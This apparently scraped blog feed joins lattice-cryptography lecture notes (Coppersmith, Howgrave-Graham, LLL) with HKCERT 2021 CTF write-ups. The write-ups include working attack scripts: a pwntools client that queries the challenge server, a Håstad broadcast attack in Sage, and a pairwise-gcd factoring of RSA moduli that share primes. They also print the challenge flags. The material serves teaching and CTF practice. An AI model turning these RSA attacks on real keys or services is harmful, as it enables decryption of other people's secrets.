Recall \(de = 1 + k\phi(n)\). Since \(\phi(n)=n-p-q+1\) we get \(de = 1+ k(n-p-q+1)\).Now reduce modulo $e$ and rearrange to get \(2k(\frac{n+1}{2} - \frac{p+q}{2})+1\equiv 0\pmod{e}\). This way we get a bivariate polynomial \(f(x,y)=2x(A+y)+1\pmod{e}\) with small roots \((x_0,y_0)=\left(k,-\frac{p+q}{2}\right)\). We can use Coppersmith’s method (provided that \(d<N^{0.292}\)) to recover the small root and recover \(d\).
Exercise Explain how to recover \(d\) given the small roots \(\left(k,-\frac{p+q}{2}\right)\).
Another theorem related to the Coppersmith’s theorem is the Howgrave-Graham’s^{2} theorem. It allows for an easier proof and better results for Coppersmith’s theorem.
Let’s use the convention that \(F(x)=\sum\limits_{i=0}^d a_i x^i\) be polynomial with integer coefficients with degree \(d\) (so \(a_d\neq 0\)). Let \(x_0\) be a root of \(F(x)\equiv 0\pmod{N}\) such that \(\lvert x_0\rvert < X\) for some integer \(X\). For that \(X\), we associate the polynomial \(F\) with the vector \(b_F = (a_0, a_1X, a_2X^2, \cdots, a_d X^d)\). The norm of a vector \(v=(v_1,\cdots v_n)\) is denoted \(\vert\vert v\rvert\rvert = \sqrt{\sum\limits_{i=1}^n v_i^2}\).
Theorem (Howgrave-Graham) If \(\lvert\lvert b_F\rvert\rvert < \frac{N}{\sqrt{d+1}}\), then \(F(x_0)=0\) over the integers (instead of mod \(N\) only).
Proof First we note that \(\sum\limits_{i=1}^n x_i \leq \sqrt{n \cdot \sum\limits_{i=1}^n x_i^2}\) by Cauchy-Schawarz inequality. Then
\[\begin{align*} \lvert F(x_0)\rvert =& \left\lvert \sum\limits_{i=0}^d a_i x_0^i\right\rvert\\ \leq& \sum\limits_{i=0}^d \lvert a_i\rvert\ \lvert x_0^i\rvert\\ < &\sum\limits_{i=0}^d \lvert a_i\rvert X^i\\ \leq &\sqrt{d+1} \lvert\lvert b_F\rvert\rvert\text{ (By the above lemma)}\\ \leq &\sqrt{d+1}\frac{N}{\sqrt{d+1}}\\ =& N \end{align*}\]So \(-N < F(x_0) < N\). Since \(F(x) \equiv 0\pmod{N}\) this means \(F(x_0) = 0\) (without mod).
Assume we have an approximation \(\hat{p}\) of \(p\) such that \(p = \hat{p} + x_0\) with \(\lvert x_0\rvert < X\). For example, \(p\) is a \(2k-\)bit integer and \(\hat{p}\) has the same \(k\) MSB as \(p\) (so we know the first half bits of \(p\)), so \(\left\lvert p-\hat{p}\right\rvert < 2^k\). Then we can actually factor the \(4k\)-bit integer \(N=pq\).
We can define the (degree-1) polynomial \(f(x) = \hat{p} + x\), then recovering the small roots of \(f(x)\) mod \(p\) allows us to recover \(p\)! Of course, we do not know \(p\) (that’s the whole point).
However, if we can lift this polynomial to another polynomial \(G\) (with small roots modulo \(p^h\) for some integer \(h\)), such that it satisfies the condition in Howgrave-Graham’s theorem, then we can directly find the the root \(x_0\) with \(G(x_0) = 0\) (and \(f(x_0)\equiv 0\pmod{p^h}\) as well), so we can get \(p\) by doing \(p=\gcd(N, f(x_0))\). Thus we have a similar-looking theorem (originally proved by Coppersmith’s theorem, later improved by Howgrave-Graham):
Theorem Let \(N=pq\), and \(p<q<2p\). Let \(0<\varepsilon < \frac 14\), and \(\hat{p}\) a natural number such that \(\left\lvert p-\hat{p}\right\rvert < \frac{1}{2\sqrt 2} N^{\frac 14 - \varepsilon}\). Then \(N\) can be factored in polynomial time of \(\log N\) and \(\frac 1\varepsilon\).
We will delay the discussion of the derivations for the second part.
Galbraith, S. D. (2012). Mathematics of public key cryptography. Cambridge University Press.
We only study polynomials with integer coefficients, and if the input are integer, the output are also integers. However some other polynomials (with rational coefficients) can also give integer ouputs. Those polynomials (called integer-valued polynomials), while interesting on its own (see: Hilbert polynomial), are not the focus today. ↩
Howgrave-Graham is one person, not two person named Howgrave and Graham. ↩
Recall a vector space \(V\) over a field (say \(\mathbb{R}\) or \(\mathbb{C}\)) is a set of “vectors”, with the addition of vectors and multiplication of a vector by a scalar, satisfying certain properties. Since we know in linear algebra that every \(n\)-dimensional vector space over \(\mathbb{R}\) is isomorphic to \(\mathbb{R}^n\), let’s focus on the case of \(\mathbb{R}^n\), which can be realized as a \(n\)-tuple of real numbers \((x_1,x_2,\cdots,x_n)\), where the \(x_i\)’s are real numbers.
Definition (Vector Space) A vector space \(V\) over a field \(K\) is an abelian group \((V,+)\) along with a scalar multiplication operator \(\cdot: K\times V\to V\) such that
- \(1\cdot v=v\qquad \forall v\in V\) and \(1\) the multiplicative identity in \(K\)
- \(c\cdot(dv)=(cd)\cdot v\qquad \forall c,d\in K, v\in V\) (Compatibility)
- \((c+d)\cdot v=c\cdot v + d\cdot v\qquad \forall c,d\in K, v\in V\) (Distributive Law 1)
- \(c\cdot (v+w)=c\cdot v + c\cdot w\qquad\forall c\in K, v,w\in V\) (Distributive Law 2)
We will omit the dot for simplicity. Also recall the definition of an abelian group \((V,+)\) is a set \(V\) with a binary operation \(+: V\times V\to V\) such that for every \(a,b,c\in V\),
- \((a+b)+c = a+(b+c)\) (Associativity)
- \(\exists e\in V\) such that \(e+a=a+e=a\). Denote the element by \(0\). (Identity)
- \(\forall a\in V\ \exists d\in V\) such that \(a+d=d+a=e\). Also denote the element by \((-a)\). (Inverse)
- \(a+b=b+a\) (Commutivity)
Theorem A vector space \(V\) of dimension \(n\) over \(K\) is isomorphic to \(K^n\) (as vector spaces).
For \(n=2\), we can just imagine an infinite plane, where vectors are simply an arrow pointing from the origin to some points in the plane. This helps us imagine what lattice looks like in a moment.
For vector spaces, we can talk about the idea of a basis, which is a set of vectors that, if we multiply each vector by some suitable scalar and add them up, we can generate every vector in the vector space (Spanning set), and that the zero vector cannot be generated unless all the scalars we choose are 0 (Linearly independent set). For example, the set \(\{(0,1),(1,0)\}\) can generate every vector \((x,y)\) in \(\mathbb{R}^2\) plane, where \(x,y\) are real numbers, just by doing \(x(0,1)+y(1,0)\).
A standard theorem of linear algebra is that a finite dimensional vector space always has a basis, and that any bases has the same number of vectors, which is the dimension of the vector space. Also, any basis can be transformed to another basis of the same vector space by taking appropriate linear combination, such that the coefficients form an invertible matrix.
However, what if we restrict \(x\) and \(y\) to be integers? The set of vectors with integer entries certainly don’t form a vector space over \(\mathbb{R}\), because for example \(0.5(1,0)\) makes a vector of not in that set. In this case, we get a Lattice.
There are many equivalent definitions of lattices, but let’s use the simplest one.
Definition (Lattice) Given a basis of \(n\) vectors of real coordinates with \(n\) entries, the lattice generated by that basis is the set of integer linear combinations of the vectors. In other words, let \(\mathcal{B}=\{\vec{v_i}=\,^t(x_{i1},x_{i2},\cdots,x_{in}): 0\lt i\leq n, x_{ij}\in\mathbb{R}\ \forall i,j\}\), then the lattice \(\mathcal{L}\) is given by \(\mathcal{L}=\mathcal{L}(\mathcal B)=\{\sum_i a_i\vec{v_i}: a_i\in\mathbb{Z}\}\). We also write \(\mathcal{B}\) to denote a matrix formed by taking the columns as the basis vectors. So we can write \(\mathcal{B}=\left[\begin{matrix}\vec{v_1}&\vec{v_2}&\cdots&\vec{v_n}\end{matrix}\right]=\left[\begin{matrix}x_{11}&x_{21}&\cdots&x_{n1}\\ x_{12}&x_{22}&\cdots&x_{n2}\\\vdots&\vdots&\ddots\\x_{1n}&x_{2n}&\cdots&x_{nn}\end{matrix}\right]\).
Of course you can also take the row as the basis vectors, then everything described later can still work by transposing all the involved matrices.
For simplicity, we shall work with integer lattices, i.e. the basis vectors have integer entries, or \(\mathcal{L}\subset \mathbb{Z}^n\).
You can visualize lattices with this: Lattice Demonstration
If two bases generate the same lattice \(\mathcal{L}\), then their corresponding matrix are related by multiplying a matrix with determinant \(\pm 1\). Matrix with unit determinant are called a unimodular matrix. We shall state this as a theorem (without proof).
Theorem Let \(\mathcal{B}\) and \(\mathcal{C}\) be two bases of some lattices. \(\mathcal{L(B)}=\mathcal{L(C)}\) iff there exists an integer matrix \(U\) such that \(\det U=\pm 1\) and \(\mathcal{B}=\mathcal{C}U\).
In fact, a basis can be transformed to another by taking elementary column operations, i.e. (1) Swapping columns, (2) multiplying the column by \(-1\), and (3) add an integer multiple of a column to another. It is left as exercise to the reader to verify that such operations corresponds to multiplying the basis matrix by a suitable unimodular matrix.
Definition The fundamental domain (or the fundamental parallelepiped) of a lattice \(\mathcal{L}(B)\), \(B=\{v_1,\cdots,v_n\}\) is the set \(\mathcal{F}=\{\sum_{i=1}^n c_iv_i: 0\leq c_i < 1\}\).
The \(n\)-dimensional volume (perhaps the Lebesgue measure) of this fundamental parallelepiped is given by \(\text{Vol}(\mathcal{F})=\left\lvert\det B\right\rvert\) The volume is invariant when changing basis, so we can also denote the volume as \(\det \mathcal{L}\).
For any lattice \(\mathcal{L}=\mathcal{L(B)}\), we define the shortest distance of \(\mathcal{L}\) to be the minimum distance between any two different lattice points. Alternatively, it is the length of the shortest (non-zero) vector in the lattice (why?). We denote this quantity by \(\lambda(\mathcal{L})=\inf\limits_{\vec{v}\in\mathcal{L}-\{\vec{0}\}}\vert\vert\vec{v}\vert\vert\), where \(\vert\vert\vec{v}\vert\vert\) here is taken to be the usual Euclidean distance \(\ell_2\). With this quantity defined, we can state the two (hard) lattice problems.
Closest Vector Problem (CVP) Given a vector \(\vec{w}\in \mathbb{R}^n\) that is not in the lattice \(\mathcal{L}\), find a vector \(\vec{v}\in\mathcal{L}\) such that the distance between them are the shortest. i.e., \(\vert\vert\vec{v}-\vec{w}\vert\vert\) is minimal.
Shortest Vector Problem (SVP) Given the lattice \(\mathcal{L}\), find \(\vec{v}\in\mathcal{L}\) such that \(\vert\vert\vec{v}\vert\vert=\lambda(\mathcal{L})\).
To a similar vein, we shall define the problem, but the solution is not required to be exact, instead allow a certain error.
Approximate Shortest vector problem (apprSVP) Let \(\psi(n)\) be a function depending on \(n\) only, and \(\mathcal{L}\) to be a lattice of dimension \(n\). The \(\psi(n)\)-apprSVP is to find a vector \(\vec{v}\in\mathcal{L}\) such that it’s distance is less than \(\psi(n)\) times that of the shortest vector. i.e. \(\vert\vert\vec{v}\vert\vert\leq\psi(n)\lambda(\mathcal{L})\).
It is left as exercise to the reader to define the approximate version of CVP (apprCVP).
CVP is known to be a NP-hard problem, while SVP is NP-hard in a certain “randomized reduction hypothesis”. However in certain cases (specific lattices for example), the problems may be easier to crack. For example, for \(n=2\), Gauss’s lattice reduction algorithm can completely solve the shortest vector problem.
One may want to estimate the distance of the shortest vector in any given lattice. Indeed, there are results that give some approximations.
Theorem(Hermite’s Theorem) For any lattice \(\mathcal{L}\), there exists a non-zero vector \(\vec{v}\in\mathcal{L}\) such that \(\vert\vert\vec{v}\vert\vert\leq \sqrt{n}\det(\mathcal{L})^{\frac 1 n}\).
Definition(Hermite’s Constant) For a given dimension \(n\), define the Hermite constant \(\gamma_n\) to be the smallest value such that every lattice \(\mathcal{L}\) of dimension \(n\) has a non-zero vector \(\vec{v}\in\mathcal{L}\) such that \(\vert\vert\vec{v}\vert\vert^2\leq \gamma_n \det(\mathcal{L})^{\frac 2 n}\). So Hermite’s theorem states that \(\gamma_n\leq n\).
For large \(n\), we know that \(\frac{n}{2\pi e}\leq \gamma_n\leq \frac{n}{\pi e}\). In fact, due to a result from Gauss, we expect for large \(n\), the shortest vector will have the length of approximately \(\sqrt{\frac{n}{2\pi e}}\det(\mathcal{L})^{\frac 1 n}\).
We first introduce the relation between \(\det \mathcal{L}\) and the basis vectors.
Theorem Let \(B=\{v_i,\cdots,v_n\}\) be the basis of a lattice \(\mathcal{L}(B)\). Then \(\det \mathcal{L}\leq \prod_{i=1}^n \|v_i\|\)
Equality holds iff the basis \(B\) is orthogonal, in other words every pair \(i\neq j\) has \(\langle v_i,v_j\rangle =0\).
Proposition-Definition (Orthogonality Defect) Define the orthogonality defect of a basis \(B\) of lattice \(\mathcal{L}(B)\) to be \(\delta(B)=\frac{\prod_{i=1}^n \|v_i\|}{\det \mathcal{L}}\)
We always have \(\delta(B)\geq 1\) (by Hadamard’s Inequality). We say a basis is non-orthogonal when \(\delta(B)\) is very large.
Theorem Every lattice \(\mathcal{L}\) of dimension \(n\) has a basis \(B\) of \(\mathcal{L}\) such that \(\delta(B)\leq n^{\frac n 2}\)
If the basis is orthogonal, then note that if \(c_i\in\mathbb{Z}\) , \(\|c_1v_1+\cdots+c_nv_n\|^2= c_1^2 \|v_1\|^2+\cdots+c_n^2 \|v_n\|^2\), so the shortest vector in \(\mathcal{L}\) is just the shortest vector in \(B\). On the other hand, for \(w\in \mathbb{R}^n-\mathcal{L}\), write \(w=t_1v_1+\cdots +t_nv_n\) (\(t_i\in \mathbb{R}\)), then for \(v=\sum_{i=1}^n c_iv_i\in\mathcal{L}\),\(\|v-w\|^2=\sum_{i=1}^n (t_i-c_i)^2 \|v_i\|^2\) So CVP can be trivially solved by taking \(c_i\) to be the integer closest to \(t_i\).
Doing the same trick for nearly-orthogonal bases (i.e. \(\delta(B)\) is close to 1) is known as the Babai’s Algorithm.
For highly non-orthogonal bases, this trick will not work. While the Babai’s algorithm is simple, it is actually quite hard to analyze when it will work or fail. We shall see better methods for solving apprSVP and apprCVP soon.
One idea to remedy the above problem is to transform the basis into a relatively orthogonal basis.
Definition (LLL-Reduced) Let \(\delta=\frac{3}{4}\) and \(\|\cdot\|\) be the standard Euclidean norm.
Let \(B=\{v_1,\cdots,v_n\}\) be a basis of lattice \(\mathcal{L}\) and \(B^*=\{v_1^*,\cdots,v_n^*\}\) be the orthogonal basis of \(\mathbb{R}^n\) (not of \(\mathcal{L}\) in general) after applying the Gram-Schmidt process. Then we say \(B\) is LLL-reduced if
- \(\lvert\mu_{i,j}\rvert\leq\frac{1}{2}\) (Size-reduced)
- \(\delta\|v_{k-1}^*\|^2\leq \|v_k^*\|^2 + \mu_{k,k-1}^2\|v_{k-1}^*\|^2\) (Lovász condition)
The Lovász condition can also be expressed as \(\|v_k^*\|^2\geq + (\delta - \mu_{k,k-1}^2)\|v_{k-1}^*\|^2\).
Theorem If a basis \(B=\{v_1,\cdots,v_n\}\) of lattice \(\mathcal{L}\) is LLL-reduced, then
- \[\prod_{i=1}^n\|v_i\|\leq 2^{\frac{n-1}{4}}\det\mathcal{L}\]
- \[\|v_j\|\leq 2^{\frac{i-1}{2}}\|v_i^*\|\text{ for all }1\leq j\leq i\leq n\]
- \[\|v_1\|\leq 2^{\frac{n-1}{4}}(\det\mathcal{L})^{\frac{1}{n}}\]
- \[\|v_1\|\leq 2^{\frac{n-1}{2}}\lambda(\mathcal{L})\]
The forth assertion implies that an LLL-reduced basis gives a solution to the \(2^{\frac{n-1}{2}}-\)apprSVP.
On the other hand, given a basis \(B\) that is LLL-reduced of lattice \(\mathcal{L}\), we can solve the \(C^n-\)apprCVP for some constant \(C\) by directly applying the Babai’s Algorithm on the LLL-reduced basis.
While the exact algorithm to find a LLL-reduced basis will not be mentioned here, we state the following theorem:
Theorem Given a basis \(B\) of lattice \(\mathcal{L}\subset \mathbb{Z}^n\), a LLL-reduced basis can be found in polynomial time of \(n\) and \(\log\max\limits_{v_i\in B}\|v_i\|\).
One important note is that empirically, LLL algorithm gives much better results than it guarantees in theory.
Hoffstein, J., Pipher, J., Silverman, J. H., & Silverman, J. H. (2008). An introduction to mathematical cryptography (Vol. 1). New York: Springer.
]]>Challenge Files:
import os
import random
from Crypto.Cipher import AES
from Crypto.Util.number import isPrime as is_prime
from Crypto.Util.Padding import pad
# 256 bits for random-number generator
N = 0xcdc21452d0d82fbce447a874969ebb70bcc41a2199fbe74a2958d0d280000001
G = 0x5191654c7d85905266b0a88aea88f94172292944674b97630853f919eeb1a070
H = 0x7468657365206e756d6265727320617265206f6620636f757273652073757321
# More challenge-specific parameters
E = 17 # The public modulus
CALLS = 17 # The number of operations allowed
# Generate a 512-bit prime
def generate_prime(seed):
random.seed(seed)
while True:
p = random.getrandbits(512) | (1<<511)
if p % E == 1: continue
if not is_prime(p): continue
return p
# Defines a 1024-bit RSA key
class Key:
def __init__(self, p, q):
self.p = p
self.q = q
self.n = p*q
self.e = E
phi = (p-1) * (q-1)
self.d = pow(self.e, -1, phi)
def encrypt(self, m):
return pow(m, self.e, self.n)
def decrypt(self, c):
return pow(c, self.d, self.n)
# Defines an user
class User:
def __init__(self, master_secret):
self.master_secret = master_secret
self.key = None
def generate_key(self):
id = random.getrandbits(256)
self.key = Key(
generate_prime(self.master_secret + int.to_bytes(pow(G, id, N), 32, 'big')),
generate_prime(self.master_secret + int.to_bytes(pow(H, id, N), 32, 'big'))
)
def send(self, m):
if self.key is None: raise Exception('no key is defined!')
m = int(m, 16)
print(hex(self.key.encrypt(m)))
def get_secret(self):
if self.key is None: raise Exception('no key is defined!')
m = int.from_bytes(self.master_secret, 'big')
print(hex(self.key.encrypt(m)))
def main():
flag = os.environ.get('FLAG', 'hkcert21{***REDACTED***}')
flag = pad(flag.encode(), 16)
master_secret = os.urandom(32)
admin = User(master_secret)
for _ in range(CALLS):
command = input('[cmd] ').split(' ')
try:
if command[0] == 'send':
# Encrypts a hexed message
admin.send(command[1])
elif command[0] == 'pkey':
# Refreshs a new set of key
admin.generate_key()
elif command[0] == 'backup':
# Gets the encrypted master secret
admin.get_secret()
elif command[0] == 'flag':
cipher = AES.new(master_secret, AES.MODE_CBC, b'\0'*16)
encrypted_flag = cipher.encrypt(flag)
print(encrypted_flag.hex())
except Exception as err:
raise err
print('nope')
if __name__ == '__main__':
main()
'''
Side-note: I knew this is _very_ similar to "Calm Down" in HKCERT CTF 2020, but rest assured that this is a different challenge.
https://github.com/samueltangz/ctf-archive-created/blob/master/20201006-hkcert-ctf/calm-down/env/chall.py
'''
The summarize the challenge, we have the flag that is encrypted with an 32-byte AES key master_secret
. We can access the master_secret
encrypted with a “random” (will get to that in Braceless) 1024-bit RSA key. The RSA key can be updated to another random key, but you do not have access to the public modulus (\(e\)=17). You can also ask the service to encrypt arbitrary integers (and get the result). You can only send 17 queries to the server in a session.
Theorem: Suppose \(n_1,\cdots,n_k\) is pairwise coprime \((\gcd(n_i,n_j)=1\) \(\forall i \neq j)\), then the system of congruence equations
\[\begin{cases} x\equiv a_1\pmod{n_1}\\ x\equiv a_2\pmod{n_2}\\ \vdots\\ x\equiv a_k\pmod{n_k}\\ \end{cases}\]has a unique solution \(x^{*}\) mod \(n_1n_2\cdots n_k\).
Suppose a plaintext is encrypted \(k\) times, where all the public exponent \(e\) are the same, and \(k\geq e\). i.e. the following holds:
Then by Chinese Remainder Theorem, we get \(x^{*}\) mod \(n_1n_2\cdots n_k\) that satisfies all the equations above. Then \(x^{*}\equiv a_i\pmod{n_i}\) for any \(i\), at the same time \(m^e\equiv a_i\pmod{n_i}\) obviously.
But \(m^e=\underbrace{m\cdot m\cdots m}_{e}\leq \underbrace{m\cdot m\cdots m}_{k} <n_1\cdot n_2\cdots n_k\), so \(x^{*}=m^e\) (without mod), since the solution is unique mod \(n_1\cdots n_k\). So we get \(m=\sqrt[e]{x^{*}}\) just by taking the usual \(e\)-th root of \(x^*\).
The setting is like so:
今有物不知其數，三三數之剩二，五五數之剩三，七七數之剩二，問物幾何？
Let’s translate that to maths:
What is the value of \(x\)?
By Chinese remainder theorem, we know that the solution is \(x\equiv 23\pmod{105}\). If we further assume that \(0\leq x < 105\), then we can immediately deduce that \(x=23\) (without the mod).
If there are no such assumption, then note that any \(x = 23 + 105k\) (\(k\) any integers) would satisfy the equation so you do not have a unique solution.
Here are the following operations that we can do (we can make a total of 17 operations):
So the goal is to try to obtain the AES key in order to decrypt the flag.
So the first idea is maybe to launch an broadcast attack, since \(e=17\) is small. However, we have a lot of obstacles ahead of us.
Note that we can send -1 to encrypt. Since \(e\) is odd (Why?), and \(-1\equiv n-1\pmod{n}\), so encrypting -1 will yield
\[E_k(-1)=(-1)^e\pmod{n}=n-1\]So we can send -1 to obtain thep ublic modulus every time we change keys!
We need 1 operation for flag; then 1 for pkey, 1 to send -1 and 1 for backup to obtain 1 ciphertext-modulus pair. Then we can only have 5 ciphertext-modulus pairs (\(3\cdot 5 + 1 = 16\) already)
Now we have the secret key \(m\), which is 32 bytes in length, and the RSA uses a 1024-bit public modulus which will be larger than \(2^{511*2}=2^{1022}\).
This means that for each public modulus \(n_i\), we have that \(m \leq 2^{256}\) so \(m^{17} < 2^{256*17} = 2^{4352} < 2^{5110} = 2^{1022*5} < n^5\). So we really only need 5 ciphertext-modulus pairs (instead of 16)! This is due to the fact that the original assumption of broadcast attack only have that the size of \(m\) is less than \(n\), but our plaintext in this case is much smaller than the modulus, so we do not need as much equations.
We use python with pwntools to aid the attack.
from pwn import *
debug = True
E = 17
if debug:
r = process(['python3', 'long_story_short.py'])
else:
server = "chalp.hkcert21.pwnable.hk"
port = 28157
r = remote(server, port)
def get_flag():
r.recvuntil(b'[cmd] ')
r.sendline(b'flag')
return int(r.recvline().decode().strip(),16)
def pkey():
r.recvuntil(b'[cmd] ')
r.sendline(b'pkey')
def send(msg):
r.recvuntil(b'[cmd] ')
r.sendline(b'send ' + msg)
return int(r.recvline().decode().strip(), 16)
def backup():
r.recvuntil(b'[cmd] ')
r.sendline(b'backup')
return int(r.recvline().decode().strip(), 16)
def round():
pkey()
_n = send(b"-1")
enc = backup()
n = _n + 1
return n, enc
enc_flag = get_flag()
N = []
ENC = []
for _ in range(5):
n, enc = round()
N.append(n)
ENC.append(enc)
print(enc_flag)
print("enc =", ENC)
print("N =", N)
This is the extraction of the ciphertext-modulus pair and the encrypted flag.
Then we feed the pairs into sage for the Chinese Remainder Theorem. We just need to take the 17-th root of the result to obtain the AES key.
enc = [...]
N = [...]
sol = CRT_list(enc, N)
secret = sol.nth_root(17)
print(int(secret).to_bytes(32, "big"))
Finally We just decrypt to get the flag.
from Crypto.Cipher import AES
enc = ...
secret = ...
cipher = AES.new(secret, AES.MODE_CBC, b'\0'*16)
dec = cipher.decrypt(enc)
print(dec)
flag: hkcert21{y0u_d0nt_n33d_e_m3ss4g3s_f0r_br0adc4s7_4t7ack_wh3n_m_i5_sm41l}
The python file is basically the same as the one in long story short, except we are not the ones who interact with the server. Instead, we are given a transcript.log that stored a session.
13,14c13,14
< E = 65537 # The public modulus
< CALLS = 65537 # The number of operations allowed
---
> E = 17 # The public modulus
> CALLS = 17 # The number of operations allowed
99,100c99,100
< Side-note: I knew this is _very_ similar to "Long Story Short" in HKCERT CTF 2021, but rest assured that this is a different challenge.
< ...:)
---
> Side-note: I knew this is _very_ similar to "Calm Down" in HKCERT CTF 2020, but rest assured that this is a different challenge.
> https://github.com/samueltangz/ctf-archive-created/blob/master/20201006-hkcert-ctf/calm-down/env/chall.py
The session first gets the encrypted flag, then repeatedly do “send 2, send 3 and backup” for 16384 times.
First we still do not have the modulus \(N\). However, we have the encryption of 2 and 3. Note that \(\begin{align*} 2^{e} - (2^e\pmod{n}) =& an\\ 3^{e} - (3^e\pmod{n}) =& bn\\ \end{align*}\) For some positive integers \(a\) and \(b\). The left hand side of both equations we already know. To obtain \(n\), we simply take the gcd of the two results, and the result will be \(cn\), where \(c\) is some small integers. We can just perform a trial division to get rid of the small factors.
The code for recovering the modulus and the (RSA) encryption of the master secret:
from math import gcd
e = 65537
N = []
BACKUP = []
e2 = pow(2,e)
e3 = pow(3,e)
with open("transcript.log", "r") as f:
f.readline()
flag = int(f.readline(), 16)
try:
while True:
f.readline()
f.readline()
enc_2 = int(f.readline(),16)
f.readline()
enc_3 = int(f.readline(),16)
f.readline()
backup = f.readline()
g = gcd(e2-enc_2, e3-enc_3)
for i in range(500,1,-1):
if g % i == 0:
g = g // i
N.append(g)
BACKUP.append(int(backup,16))
except Exception as e:
print(e)
with open("var.py", "w") as f:
f.write(f"flag= {flag}\n")
f.write(f"N= {N}\n")
f.write(f"BACKUP= {BACKUP}")
Now we have a bunch of \(N\)’s and encryptions. We can’t really do Chinese remainder theorem here as \(e=65537\) is too large.
Exercise: Copy the analysis for the long story short part to conclude why Chinese remainder theorem is not feasible in this case.
With so many moduli, what can we do? One thing is to try to check their gcd to find any common factor. If there are any common factors among the moduli, then we can already recover the private exponent and thus the master_secret!
Let’s just use a simple python script to loop through all pairs of moduli and look for any common factors.
from math import gcd
from var import flag, N, BACKUP
from itertools import combinations
from Crypto.Cipher import AES
e = 65537
flag = flag.to_bytes(64, 'big')
def decrypt(n, p, enc):
q = n // p
phi = (p-1)*(q-1)
d = pow(e, -1, phi)
return pow(enc, d, n)
for enum1, enum2 in combinations(enumerate(N), 2):
i1, n1 = enum1
i2, n2 = enum2
g = gcd(n1, n2)
if g != 1:
break
g = gcd(N[i1],N[i2])
dec1 = decrypt(N[i1], g, BACKUP[i1])
dec2 = decrypt(N[i2], g, BACKUP[i2])
assert dec1 == dec2
secret = dec1.to_bytes(32, 'big')
cipher = AES.new(secret, AES.MODE_CBC, b'\0'*16)
dec = cipher.decrypt(flag)
print(dec)
After 8 minutes, we actually get a common factor! So the problem is already solved…
Why is there a common factor? For that we look at the code for parameter generation:
self.key = Key(
generate_prime(self.master_secret + int.to_bytes(pow(G, id, N), 32, 'big')),
generate_prime(self.master_secret + int.to_bytes(pow(H, id, N), 32, 'big'))
)
def generate_prime(seed):
random.seed(seed)
while True:
p = random.getrandbits(512) | (1<<511)
if p % E == 1: continue
if not is_prime(p): continue
return p
Since the random is seeded by the input, and master_secret
is fixed, so it comes down to whether the latter part is fixed! In this case we are using the function \(f(x) = G^x\pmod{n}\) for the latter part, where id
is random. id
is a random 256-byte integer, and \(N\) is also a 256-byte integer, we might (wrongly) assume, that \(G\) and \(H\) are primitive roots mod \(N\), and if that is the case, the chance of two \(f(x)\) and \(f(y)\) to be equal are quite low.
However, We actually have that:
\(33554432\) is just a 25-bit number! By some math we know that the probability of at least one collision when we have \(16384\) random samples is actually \(1-\frac{33554432!}{33554432^{16384}(33554432-16384)!}\approx 98\%\). (This is the famous birthday problem)
So the primes are basically guaranteed to collide!
The flag of this challenge is hkcert21{y0u_d0nt_n33d_p41rw15e_9cd_1f_y0u_c4n_d0_i7_1n_b4tch}
. What is batch gcd?
As it turns out, there is a fast algorithm to compute if (and which) 1 of the \(N\) have any common factor with the other remaining \(N\)’s. If there are, then we can already factor one of the modulus. The idea of the algorithm is to, for the list \(X\) of integers, to compute
We just need to precompute the product of all the integers, then invoke gcd for \(n\) times (where \(n\) is the number of integers), as opposed to the naive pairwise comparison method, which requires \(\frac{n(n-1)}{2}\) gcd calls. However as the pairwise method works it doesn’t matter.
]]>